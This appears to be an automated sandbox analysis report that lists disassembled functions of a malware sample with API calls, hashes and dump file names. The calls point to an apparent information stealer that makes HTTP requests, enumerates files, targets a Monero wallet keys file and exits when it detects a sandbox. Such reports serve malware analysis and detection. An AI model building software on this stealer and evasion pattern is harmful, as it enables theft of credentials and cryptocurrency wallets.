Part of subcall function 00816280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00816335
Part of subcall function 00816280: HttpOpenRequestA.WININET(00000000,GET,?,00EFDB60,00000000,00000000,00400100,00000000), ref: 00816385
Part of subcall function 00816280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008163BF
Part of subcall function 00816280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008163D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00825228

Strings

ERROR, xrefs: 00825273
ERROR, xrefs: 0082521A

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: ac1276a67920980ba4ff6c53c3833db723954a0ef9464733ad1804a595322a2d
Instruction ID: fe390d3ca4ca882dec57c71c203fc22c1cb3cf42eadc837d35b6c49eac95d3c8
Opcode Fuzzy Hash: ac1276a67920980ba4ff6c53c3833db723954a0ef9464733ad1804a595322a2d
Instruction Fuzzy Hash: 9E111F70900518ABCB18FF68ED96AED7378FF50300F404164F91AC6192EF346B85C693

Function 00811220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0081123E
ExitProcess.KERNEL32 ref: 00811294

Strings

@, xrefs: 00811233

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 803317263-2766056989
Opcode ID: 87c017e05390cb3c022408dcd54ce12b59e07ebe6c92f07edb5cc355d0a4c309
Instruction ID: a1227b08e10d21ab185e741f3dc19b80a5819fbdaf9e2f4eccb3167655c52787
Opcode Fuzzy Hash: 87c017e05390cb3c022408dcd54ce12b59e07ebe6c92f07edb5cc355d0a4c309
Instruction Fuzzy Hash: C201FBB0A4431CEAEF10DBE4DC4AB9EBBB8FF14706F208148E705F6280D7745585879A

Function 00824F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00828DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00828E0B

lstrcat.KERNEL32(?,00000000), ref: 00824F7A
lstrcat.KERNEL32(?,00831070), ref: 00824F97
lstrcat.KERNEL32(?,00EF8A40), ref: 00824FAB
lstrcat.KERNEL32(?,00831074), ref: 00824FBD

Part of subcall function 00824910: wsprintfA.USER32 ref: 0082492C
Part of subcall function 00824910: FindFirstFileA.KERNEL32(?,?), ref: 00824943

Part of subcall function 00824910: StrCmpCA.SHLWAPI(?,00830FDC), ref: 00824971
Part of subcall function 00824910: StrCmpCA.SHLWAPI(?,00830FE0), ref: 00824987
Part of subcall function 00824910: FindNextFileA.KERNEL32(000000FF,?), ref: 00824B7D
Part of subcall function 00824910: FindClose.KERNEL32(000000FF), ref: 00824B92

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: d49cfc67cd8929f4aafc65c384259f233be2b3fde9240db75f1df0672377c077
Instruction ID: 30caa7eb2915790682c99df5af868627b452a21016118d725057ed9b366cf5bb
Opcode Fuzzy Hash: d49cfc67cd8929f4aafc65c384259f233be2b3fde9240db75f1df0672377c077
Instruction Fuzzy Hash: 2121B8B6A00318A7CB54F7A4EC46EED373CFB64701F004654B65AD2181EE7596C9CBA3

Function 00820740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00EF8B10), ref: 0082079A
StrCmpCA.SHLWAPI(00000000,00EF8BA0), ref: 00820866
StrCmpCA.SHLWAPI(00000000,00EF8AB0), ref: 0082099D

Part of subcall function 0082A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0082A7E6

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 002d3d503417a5367a4208677d45f0499a670eb3a5be7b768d18903018858b2d
Instruction ID: 7a86d890518c9e6bb7e7de474f3663c9b71cb6b3a07e6263852762a28630b94c
Opcode Fuzzy Hash: 002d3d503417a5367a4208677d45f0499a670eb3a5be7b768d18903018858b2d
Instruction Fuzzy Hash: 03913875A102089FCB18EF68D995AED77B9FF94300F508519E84ADF242DB309A46CB93

Function 00820765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00EF8B10), ref: 0082079A
StrCmpCA.SHLWAPI(00000000,00EF8BA0), ref: 00820866
StrCmpCA.SHLWAPI(00000000,00EF8AB0), ref: 0082099D

Part of subcall function 0082A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0082A7E6

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: e51e63cef424b2cbe7cbfea42d380c6f30ed18b7da0e3a6bd20c45b498c462ab
Instruction ID: 077efcacdc25aee5a1fca81396bafc4640a8acc6dbbd277ae980511e3681338c
Opcode Fuzzy Hash: e51e63cef424b2cbe7cbfea42d380c6f30ed18b7da0e3a6bd20c45b498c462ab
Instruction Fuzzy Hash: 9B813775B102089FCB1CEF68D995AEDB7B5FF94300F508519E40ADB252DB309A46CB93

Function 6C653060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C653095

Part of subcall function 6C6535A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C6DF688,00001000), ref: 6C6535D5
Part of subcall function 6C6535A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6535E0
Part of subcall function 6C6535A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6535FD
Part of subcall function 6C6535A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C65363F
Part of subcall function 6C6535A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C65369F
Part of subcall function 6C6535A0: __aulldiv.LIBCMT ref: 6C6536E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C65309F

Part of subcall function 6C675B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6756EE,?,00000001), ref: 6C675B85
Part of subcall function 6C675B50: EnterCriticalSection.KERNEL32(6C6DF688,?,?,?,6C6756EE,?,00000001), ref: 6C675B90
Part of subcall function 6C675B50: LeaveCriticalSection.KERNEL32(6C6DF688,?,?,?,6C6756EE,?,00000001), ref: 6C675BD8
Part of subcall function 6C675B50: GetTickCount64.KERNEL32 ref: 6C675BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6530BE

Part of subcall function 6C6530F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C653127
Part of subcall function 6C6530F0: __aulldiv.LIBCMT ref: 6C653140

Part of subcall function 6C68AB2A: __onexit.LIBCMT ref: 6C68AB30

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 0e0cdc154a02b5a123ad75d305439fadaf1b84d046cf834c0b44f7394be4601c
Instruction ID: 7e821f3c6f95d7c1e9a327f8a3053eed9933defdbf171d57371cc51e0863054d
Opcode Fuzzy Hash: 0e0cdc154a02b5a123ad75d305439fadaf1b84d046cf834c0b44f7394be4601c
Instruction Fuzzy Hash: 48F0D612D2078896CB10DF7588911A6B370AF6F114F545729F84463A61FB2071E883DE

Function 00829470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00829484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 008294A5
CloseHandle.KERNEL32(00000000), ref: 008294AF

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: d08094cb8993c785684c95042f99d99ea4c480ef793f747064627f37755d7351
Instruction ID: 50c43328ed2538a2de6fd5fcbb8260cbd23a033872dd0bb15dd4341a8ffa04e5
Opcode Fuzzy Hash: d08094cb8993c785684c95042f99d99ea4c480ef793f747064627f37755d7351
Instruction Fuzzy Hash: 9AF03A74A0020CABDB04EFA4DC4AFE97778FB08701F004598BA0997290D6B06A86CB91

Function 00811110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0081112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00811132
ExitProcess.KERNEL32 ref: 00811143

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 18db3b9694d1d2d9b15e684d4517b35126d821063376c6dbc5b5c17cbcaffffc
Instruction ID: 7d01579d7b0bc81fb00aa24264b2f7a7cbda48a658562269f6cbbfc01a87295b
Opcode Fuzzy Hash: 18db3b9694d1d2d9b15e684d4517b35126d821063376c6dbc5b5c17cbcaffffc
Instruction Fuzzy Hash: F2E0E670A45308FBEB10EBE49C0EB497BBCFF14B12F104154F709B65D0D6B52641969A

Function 00821A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
